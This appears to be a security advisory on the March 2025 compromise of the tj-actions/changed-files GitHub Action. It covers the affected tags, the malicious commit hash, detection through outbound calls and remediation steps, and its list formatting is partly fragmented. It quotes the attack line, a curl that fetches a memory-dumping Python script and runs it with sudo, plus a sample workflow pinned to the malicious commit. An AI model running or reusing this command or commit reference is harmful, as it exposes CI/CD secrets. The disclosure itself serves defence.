A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.
This has been patched in v46.0.1.
The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.
v1.0.0
: 0e58ed8671d6b60d0890c21b07f8835ace038e67 v35.7.7-sec
: 0e58ed8671d6b60d0890c21b07f8835ace038e67 v44.5.1
: 0e58ed8671d6b60d0890c21b07f8835ace038e67 The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`
This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.
name: "tj-action changed-files incident"
on:
pull_request:
branches:
- main
jobs:
changed_files:
runs-on: ubuntu-latest
steps:
- name: Get changed files
id: changed-files
uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67
Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:
- gist.githubusercontent.com
Live reproduction logs:
🔗 Harden-Runner Insights
This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com
.
The vulnerability was active between March 14 and March 15, 2025.
Review your workflows executed between March 14 and March 15:
echo 'xxx' | base64 -d | base64 -d
Update workflows referencing the compromised commit:
Tagged versions:
v35
, v44.5.1
), no action is required as these tags have been updated and are now safe to use. Rotate potentially exposed secrets:
{ "nvd_published_at": "2025-03-15T06:15:12Z", "cwe_ids": [ "CWE-506" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-03-15T16:39:06Z" }